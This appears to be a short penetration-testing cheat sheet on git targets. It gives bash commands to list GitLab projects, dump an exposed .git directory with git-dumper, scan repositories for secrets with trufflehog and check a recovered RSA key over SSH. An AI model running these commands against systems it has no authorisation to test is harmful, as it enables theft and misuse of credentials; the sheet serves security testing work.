###
GIT
###

***************
GITLAB Projects
***************

| List gitlab projects

.. code-block:: bash

  curl -s http://gitlabserver/explore/projects | grep 'class="project" href'
  <a class="project" href="/global/secretproject1"> [...]

|

************
Exposed .git
************

| You found a .git on a website and you want to retrieve data from it

.. code-block:: bash

  pipx install git+https://github.com/arthaud/git-dumper
  mkdir /tmp/website
  git-dumper http://website/.git /tmp/website

|

************
Scan Project
************

| Search for sensitive informations such as RSA keys

.. code-block:: bash

  trufflehog http://gitlabserver/global/secretproject1

|

********
Test RSA
********

| You can try an RSA key on git server, it will return associated user

.. code-block:: bash

  ssh -T git@gitlabserver -i /tmp/git_id_rsa
  Welcome to GitLab, @userlambda!
